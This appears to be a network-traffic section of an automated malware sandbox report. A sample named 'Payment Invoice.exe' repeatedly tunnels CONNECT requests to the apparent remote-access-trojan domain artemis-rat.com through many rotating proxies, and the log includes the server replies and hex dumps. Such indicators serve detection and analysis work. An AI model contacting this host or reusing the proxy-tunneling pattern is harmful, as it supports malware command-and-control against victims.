                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1637192.168.2.454199186.124.164.213807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.982198000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1638192.168.2.45496583.136.219.140807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.982789040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.191859961 CET805INHTTP/1.1 500 Internal Server Error
                                                                Date: Mon, 11 Mar 2024 15:15:22 GMT
                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                Content-Length: 613
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1639192.168.2.45493967.43.227.228150797076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.983088970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1640192.168.2.455059140.84.176.2464437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.983443975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1641192.168.2.45505243.153.174.44437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.983499050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1642192.168.2.454254209.222.97.30194817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.983772039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.089210033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.123892069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:34.202817917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1643192.168.2.450216183.89.9.8280807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.983953953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.089198112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.548697948 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1644192.168.2.455108140.84.176.2464437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.989031076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1645192.168.2.45510943.153.174.44437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.990075111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1646192.168.2.454383209.182.192.90383107076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.991715908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.027000904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.027035952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:34.121082067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1647192.168.2.455110140.84.176.2464437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.993201017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1648192.168.2.455111140.84.176.2464437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.995510101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1649192.168.2.455020104.18.44.93807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.001838923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.157145023 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:22 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1650192.168.2.455024104.20.75.69807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.002031088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.156522036 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:22 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1651192.168.2.45496872.10.160.9043377076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.002125025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:36.447058916 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1652192.168.2.454849117.160.250.138807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.002125025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.689976931 CET303INHTTP/1.1 400 Bad Request
                                                                Server: openresty
                                                                Date: Mon, 11 Mar 2024 15:15:22 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 154
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1653192.168.2.45492947.243.114.19281807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.018310070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.336322069 CET311INHTTP/1.1 400 Bad Request
                                                                Server: nginx
                                                                Date: Mon, 11 Mar 2024 15:15:22 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 166
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1654192.168.2.455015209.126.5.138638867076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.099179983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.683305025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.379080057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.777070999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.292548895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.804981947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.341460943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:37.386307001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:47.276736975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1655192.168.2.455043104.21.194.19807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.099190950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.253563881 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:22 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1656192.168.2.455044162.159.242.230807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.099394083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.260540962 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:22 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1657192.168.2.454944147.75.34.86100087076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.104859114 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Mar 11, 2024 16:15:22.411874056 CET65INHTTP/1.1 200 Connection Established
                                                                Proxy-Agent: Zscaler/6.3


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1658192.168.2.453024198.12.253.239385887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.104860067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.214420080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.214786053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:34.323873997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:46.323570967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
